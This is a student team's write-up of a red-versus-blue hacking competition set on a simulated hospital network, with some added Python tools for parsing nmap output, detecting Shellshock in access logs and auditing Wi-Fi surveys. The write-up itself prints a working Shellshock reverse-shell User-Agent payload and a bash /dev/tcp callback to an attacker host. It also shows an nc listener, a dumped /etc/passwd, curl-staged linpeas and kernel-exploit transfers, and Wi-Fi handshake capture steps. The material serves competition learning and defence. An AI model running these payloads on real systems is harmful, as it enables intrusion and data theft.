Hack The Building 2.0 Preliminary : Hospital Edition 2023
Our experience participating in the Hack The Building 2.0 Hospital Edition Preliminary.
About
The preliminary was a force-on-force style hackathon (Blue vs. Red Team) against other universities; whoever finished near the top of the leaderboard earned a spot at the in-person event. Our small team of about 3-4 participated as a red team. Since this was our first time participating in such a competition we did not qualify for the in-person event, but it was really fun!
Initial Foothold / Prepositioning
Scanning and Enumeration
We connected to the network using an OpenVPN profile and started with an initial nmap scan for open web ports across the network.
sudo nmap 172.19.99.0/24 -p80,443 -sV -T5 --min-rate 1000
We did find some hosts, but most of the output was "garbage" and not useful, so we copied and pasted the nmap output into a text file named "garbage" and then sorted through it, removing anything unnecessary.
nano garbage
# Sequence of commands used for filtering
cat garbage | grep -v tcpwrapped
cat garbage | grep -v tcpwrapped | sort
cat garbage | grep -v tcpwrapped | sort | grep -v "SERVICE VERSION"
cat garbage | grep -v tcpwrapped | sort | grep -v "STATE SERVICE"
cat garbage | grep -v tcpwrapped | sort | grep -v "STATE SERVICE" | grep -v "Nmap scan report for "
cat garbage | grep -v tcpwrapped | sort | grep -v "STATE SERVICE" | grep -v "Nmap scan report for " | grep -v "Host is up "
cat garbage | grep -v tcpwrapped | sort | grep -v "STATE SERVICE" | grep -v "Nmap scan report for " | grep -v "Host is up " | uniq
cat garbage | grep -v tcpwrapped | sort | grep -v "STATE SERVICE" | grep -v "Nmap scan report for " | grep -v "Host is up " | uniq > information
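The grep chain above works, but it throws away the host a port belongs to and breaks as soon as a banner happens to contain one of the filtered words. As an added example (not part of the original writeup), here is a small Python parser that reads nmap normal output into host/port/service records and applies the same filtering (drop closed/filtered ports and tcpwrapped entries, then sort and de-duplicate). The scan output embedded in it is constructed; only the 172.19.99.0/24 range and the Apache host on 172.19.99.141 come from the writeup.

```python
import re
from typing import Dict, List

# Constructed sample of `nmap -sV` normal output. Hosts, ports and banners are
# made up for this example; only the 172.19.99.0/24 range and the Apache host
# come from the writeup.
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 7.94 ( https://nmap.org )
Nmap scan report for 172.19.99.12
Host is up (0.0010s latency).

PORT    STATE  SERVICE VERSION
80/tcp  open   tcpwrapped
443/tcp closed https

Nmap scan report for 172.19.99.141
Host is up (0.0012s latency).

PORT    STATE  SERVICE VERSION
80/tcp  open   http    Apache httpd 2.2.22 ((Ubuntu))
443/tcp closed https

Nmap scan report for 172.19.99.200
Host is up (0.0030s latency).

PORT    STATE    SERVICE  VERSION
80/tcp  filtered http
443/tcp open     ssl/http nginx 1.18.0
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (3 hosts up) scanned in 12.34 seconds
"""

# "Nmap scan report for host (1.2.3.4)" also matches; the first token is kept.
HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
# port/proto  state  service  [version ...]
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*\S))?\s*$")


def parse_nmap_output(text: str) -> List[Dict[str, object]]:
    """Turn nmap normal output into one record per port line.

    The current host is taken from the most recent "Nmap scan report for"
    line; port lines are matched by PORT_RE, everything else is ignored."""
    records: List[Dict[str, object]] = []
    host = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)
            continue
        m = PORT_RE.match(line)
        if m and host is not None:
            port, proto, state, service, version = m.groups()
            records.append({
                "host": host,
                "port": int(port),
                "proto": proto,
                "state": state,
                "service": service,
                "version": version or "",
            })
    return records


def interesting_services(records):
    """Drop what the grep chain threw away: closed/filtered ports and
    'tcpwrapped' entries, which carry no usable service information."""
    return [r for r in records
            if r["state"] == "open" and r["service"] != "tcpwrapped"]


def summarize(records) -> List[str]:
    """One sorted, de-duplicated line per host:port (the `sort | uniq` step)."""
    lines = {f'{r["host"]}:{r["port"]}/{r["proto"]} {r["service"]} {r["version"]}'.rstrip()
             for r in records}
    return sorted(lines)


if __name__ == "__main__":
    for line in summarize(interesting_services(parse_nmap_output(SAMPLE_NMAP_OUTPUT))):
        print(line)
```

Feeding it the saved "garbage" file instead of the constructed sample is a matter of `parse_nmap_output(open("garbage").read())`; for anything bigger than a /24, nmap's `-oX` output with a real XML parser is the more robust route.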
Vulnerability Assessment
After filtering through the Nmap output, we found that 172.19.99.141 was running Apache on port 80. After going to http://172.19.99.141 we see that the page says "What a shockingly boring page", could this be a hint at a Shellshock vulnerability???
We ran the http-shellshock Nmap script to verify that the web app was vulnerable, and it is!
sudo nmap -sV -p80 --script=http-shellshock 172.19.99.141
Shellshock Exploitation
1. Generate a Reverse Shell
Generate a revshell at https://revshells.com
Attacker IP: 10.73.1.44
Port: 5555
Listener type: nc -lvnp 5555
set advanced to on
Reverse, Bash -i
/bin/bash -i >& /dev/tcp/10.73.1.144/5555 0>&1
shell: /bin/bash
encoding: none
2. Setup a nc listener to catch the revshell
nc -lvnp 5555
3. Inspect > Network (to modify the User-Agent HTTP request header)
Edit the User-Agent HTTP request header:
User-Agent:() { : ; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/10.73.1.144/5555 0>&1'
Send a New Request with the modified User-Agent header and view the Response
4. Profit $$$
www-data@dev-web:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/false
sys:x:3:3:sys:/dev:/bin/false
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/bash
man:x:6:12:man:/var/cache/man:/bin/false
lp:x:7:7:lp:/var/spool/lpd:/bin/false
mail:x:8:8:mail:/var/mail:/bin/false
news:x:9:9:news:/var/spool/news:/bin/false
uucp:x:10:10:uucp:/var/spool/uucp:/bin/false
proxy:x:13:13:proxy:/bin:/bin/false
www-data:x:33:33:www-data:/var/www:/bin/false
backup:x:34:34:backup:/var/backups:/bin/false
list:x:38:38:Mailing List Manager:/var/list:/bin/false
irc:x:39:39:ircd:/var/run/ircd:/bin/false
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/false
nobody:x:65534:65534:nobody:/nonexistent:/bin/false
libuuid:x:100:101::/var/lib/libuuid:/bin/false
syslog:x:101:103::/home/syslog:/bin/false
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:103:106::/var/run/dbus:/bin/false
whoopsie:x:104:107::/nonexistent:/bin/false
landscape:x:105:110::/var/lib/landscape:/bin/false
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
rfabian:x:1000:1000:rfabian,,,:/home/rfabian:/bin/bash
sysadmin:x:1001:1001:,,,:/home/sysadmin:/bin/bash
ansible:x:1002:1002::/home/ansible:/bin/bash
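From the blue-team side of the same exercise, the payload above is easy to spot: bash's exported-function syntax "() {" has no business in a User-Agent, Referer or request line, and a CGI server exports all of those into the environment. As an added example (not part of the original writeup), here is a Python detector that parses Apache combined-format access log lines, flags any client-controlled field carrying that prefix, plus the classic self-check for whether a local bash binary is patched. The log lines are constructed; the attacker address 10.73.1.144 and the "() { :; };" prefix are the ones used above.

```python
import os
import re
import subprocess
from typing import Dict, List

# Constructed Apache "combined" format log lines (made up for this example).
# The second and fourth lines carry the same "() { :; };" function-definition
# prefix that the User-Agent payload above uses, once in the User-Agent and
# once in the Referer; the others are ordinary traffic.
SAMPLE_ACCESS_LOG = [
    '172.19.99.50 - - [04/Oct/2023:14:02:11 +0000] "GET /index.cgi HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/117.0"',
    '10.73.1.144 - - [04/Oct/2023:14:03:27 +0000] "GET /index.cgi HTTP/1.1" 200 512 "-" "() { :; }; echo; echo; /bin/bash -c id"',
    '172.19.99.51 - - [04/Oct/2023:14:04:02 +0000] "GET /static/app.js HTTP/1.1" 304 0 "http://172.19.99.141/" "curl/7.81.0"',
    '10.73.1.144 - - [04/Oct/2023:14:05:40 +0000] "GET /index.cgi HTTP/1.1" 500 0 "() { :; }; echo; /bin/true" "Mozilla/5.0"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Bash's exported-function syntax: "()" followed by "{", with optional whitespace.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")
# Client-controlled values a CGI server exports into the environment.
HEADER_FIELDS = ("ua", "referer", "request")


def scan_access_log(lines: List[str]) -> List[Dict[str, str]]:
    """Return one finding per header value that carries the function-definition prefix."""
    findings: List[Dict[str, str]] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # in production, count unparsed lines instead of dropping them silently
        for field in HEADER_FIELDS:
            value = m.group(field)
            if SHELLSHOCK_RE.search(value):
                findings.append({"ip": m.group("ip"), "time": m.group("time"),
                                 "field": field, "value": value})
    return findings


def bash_is_patched(bash: str = "bash") -> bool:
    """Classic self-check for a local bash binary: an unpatched bash executes the
    trailing command while importing the function-style variable and prints
    'vulnerable'; a patched one only prints 'test'."""
    env = {"x": "() { :;}; echo vulnerable", "PATH": os.environ.get("PATH", "/usr/bin:/bin")}
    proc = subprocess.run([bash, "-c", "echo test"], env=env,
                          capture_output=True, text=True)
    return "vulnerable" not in proc.stdout


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f'{f["time"]} {f["ip"]} shellshock pattern in {f["field"]}: {f["value"]!r}')
```

The combined format only logs the User-Agent and Referer, so the request line and those two headers are all the detector can see; if the web server logs other headers (Cookie, X-Forwarded-For, ...), add them to HEADER_FIELDS, since bash on an unpatched host imports any environment variable with that prefix. The real fix is the bash update that stops importing functions from arbitrary variables, which `bash_is_patched()` confirms on the host itself.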
Privilege Escalation
We got a low-privileged user shell; now we can perform some local enumeration and see what can be exploited to escalate our privileges to root.
ls
index.cgi
whoami
www-data
In this case we used linpeas to see if we can find any privilege escalation vectors.
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
Transfer it to the target by hosting it on a Python web server and downloading it with curl on the compromised machine.
python3 -m http.server 80
cd /tmp
ls -la
curl http://10.73.1.144/linpeas.sh > linpeas.sh
sh linpeas.sh > linpeasoutput
Here we have some interesting Linpeas output.
OS: Linux version 3.11.0-15-generic (buildd@akateko) (gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5) ) #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014
User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Hostname: dev-web
Writable folder: /run/shm
It looks like we have a writable folder, /run/shm, but here we tried running a kernel exploit instead.
We compiled the kernel exploit on our attack host and then transferred it to the compromised machine using the same method we used to transfer linpeas. Unfortunately, the kernel exploit did not work.
(Attack Host)
searchsploit 41995
searchsploit -m 41995
ozzy@kali:~$ gcc 41995.c
ozzy@kali:~$ mv a.out 41995
python -m http.server 80
(Compromised Machine)
curl http://10.73.1.144/41995 > 41995
www-data@dev-web:/tmp$ chmod +x 41995
www-data@dev-web:/tmp$ ./41995
bash: ./41995: cannot execute binary file
www-data@dev-web:/tmp$ exit
^C
This being the second to last day of the preliminary, we decided to take a breather and try again tomorrow, the last day...
Wi-Fi Exploitation
The next day, it was announced that teams that had been unable to establish persistence were automatically given a jump host (as root) to speed things up a bit.
So with our dedicated jump host, the next step was to perform Wi-Fi operations and try to exploit any of the Wi-Fi networks that were physically near the jump host/compromised host.
Once we ssh into our jump host we can move on to wireless sniffing and wireless compromise.
iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
wlan0 IEEE 802.11 ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=31 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
airmon-ng check kill
(kills processes that interfere)
airmon-ng start wlan0
iwconfig
- check if wlan0mon is active and in monitor mode
When monitoring wireless networks, here is a list of the airodump-ng columns we might want to pay attention to:
BSSID = MAC address of the Access Point (AP)
CH = channel 1-14 (1, 6 and 11 are the big ones)
PWR = power level (closer to 0 = closer to the device)
Beacons / #Data = frames seen from the AP (0 data = no traffic, e.g. not connected to the internet)
ENC = encryption (e.g. WPA2)
AUTH = authentication (e.g. PSK)
ESSID = network name; a value like length:21 instead of a name could be a hidden network
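The same columns are what a site owner reads when auditing their own airspace, so as an added example (not part of the original writeup) here is a Python parser for the access-point table of the CSV that airodump-ng writes with -w, followed by a small audit that flags BSSIDs not on a sanctioned list (possible rogue APs), open or WEP networks, and hidden ESSIDs (an announced name length with no name). The CSV contents and the allowlist are constructed for this example; the column names are airodump-ng's.

```python
import csv
import io
from typing import Dict, List, Set

# Constructed airodump-ng style CSV (the access-point table of the file that
# `-w` writes). BSSIDs, names and counters are made up for this example.
SAMPLE_AIRODUMP_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:00:00:01, 2023-10-04 14:00:01, 2023-10-04 14:10:01,  6,  54, WPA2, CCMP, PSK, -41,  120,    0,   0.  0.  0.  0,  11, HospitalICS,
AA:BB:CC:00:00:02, 2023-10-04 14:00:03, 2023-10-04 14:10:03,  1,  54, OPN,  ,    ,  -67,   80,    0,   0.  0.  0.  0,   9, GuestWiFi,
AA:BB:CC:00:00:03, 2023-10-04 14:00:05, 2023-10-04 14:10:05, 11,  54, WEP,  WEP,  ,  -75,   40,   12,   0.  0.  0.  0,   8, OldPumps,
AA:BB:CC:00:00:04, 2023-10-04 14:00:07, 2023-10-04 14:10:07,  6,  54, WPA2, CCMP, PSK, -52,   95,    0,   0.  0.  0.  0,  21, ,
"""

# Constructed allowlist of the BSSIDs the site actually operates.
KNOWN_BSSIDS: Set[str] = {"AA:BB:CC:00:00:01"}


def parse_airodump_csv(text: str) -> List[Dict[str, object]]:
    """Parse the AP table of an airodump-ng CSV into one dict per access point.

    The real file has a second table (stations) after a blank line; only the
    first table is read here."""
    ap_table = text.split("\n\n")[0]
    reader = csv.DictReader(io.StringIO(ap_table), skipinitialspace=True)
    aps: List[Dict[str, object]] = []
    for row in reader:
        if not row.get("BSSID"):
            continue
        id_length = int((row.get("ID-length") or "0").strip() or 0)
        essid = (row.get("ESSID") or "").strip()
        aps.append({
            "bssid": row["BSSID"].strip(),
            "channel": int(row["channel"].strip()),
            "privacy": row["Privacy"].strip(),                # e.g. WPA2, OPN, WEP
            "auth": (row.get("Authentication") or "").strip(),  # e.g. PSK
            "power": int(row["Power"].strip()),               # closer to 0 = stronger signal
            "beacons": int(row["# beacons"].strip()),
            "essid": essid,
            # airodump shows "<length: N>" for a hidden ESSID: a name length
            # was announced but no name.
            "hidden": id_length > 0 and essid == "",
        })
    return aps


def audit_access_points(aps, known_bssids: Set[str]):
    """Flag what a site owner would want to know from the same survey: APs not
    on the allowlist (possible rogue), open/WEP networks, hidden ESSIDs."""
    findings = []
    for ap in aps:
        issues = []
        if ap["bssid"] not in known_bssids:
            issues.append("unknown BSSID (possible rogue AP)")
        if ap["privacy"] in ("OPN", "WEP"):
            issues.append(f"weak encryption: {ap['privacy']}")
        if ap["hidden"]:
            issues.append("hidden ESSID")
        if issues:
            findings.append((ap["bssid"], issues))
    return findings


if __name__ == "__main__":
    for bssid, issues in audit_access_points(parse_airodump_csv(SAMPLE_AIRODUMP_CSV), KNOWN_BSSIDS):
        print(bssid, "->", "; ".join(issues))
```

A real capture file is read the same way (`parse_airodump_csv(open("HTB-01.csv").read())`), and the allowlist would come from the site's AP inventory rather than a literal in the script; the Privacy column can also carry combined values such as "WPA2 WPA", which the weak-encryption check treats as fine.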
Here, given the instructions from the white team, we had to choose one of the networks we wanted to wirelessly deauth to capture its WPA handshake, which we would then attempt to crack offline to ultimately gain access to the Wi-Fi network.
airodump-ng wlan0mon
(choose a network)
CTRL + C
airodump-ng -c 6 --bssid <BSSIDofAP> -w <HTB.pcap> wlan0mon
Once the WPA handshake was captured, we only had to show a proof of concept and not actually try to crack the password. Once proof was given, we were given the actual password to connect with and then we could begin to enumerate any active and vulnerable ICS systems connected to that Wi-Fi network.
Note: There were several Wi-Fi networks, which means each Wi-Fi network had different ICS systems connected to it.
ICS Enumeration & The End...
So far we have:
Successfully exploited a web server on 172.19.99.0/24 to gain a foothold
Performed Wi-Fi exploitation from the foothold on any nearby Wi-Fi networks
Connected to the nearby Wi-Fi network
After successfully exploiting and connecting to the Wi-Fi network, we can go back to the enumeration phase and enumerate any host on that network, in this case any Industrial Control Systems (ICS) that we may be able to mess around with, and accomplish any objectives we have been assigned.
We were able to enumerate one of the ICS that we were tasked to mess around with and cause chaos (forgot to take screenshots of the nmap scans), but at this point we ran out of time and were unable to exploit any of the ICS :(
Just to get an idea of what some of the challenges were like, they included:
Take control of systems controlling a lake, and then try to make the lake flood
Disable a power grid for a complete "lights out"
Disable sewage systems
Turn on a ferris wheel
Shutoff camera systems
Disable crane operations
Manipulate and disrupt a conveyor belt system
Overall, this competition was fun and a great learning experience, hopefully UNG can qualify for Hack The Building 3.0 whenever it is announced!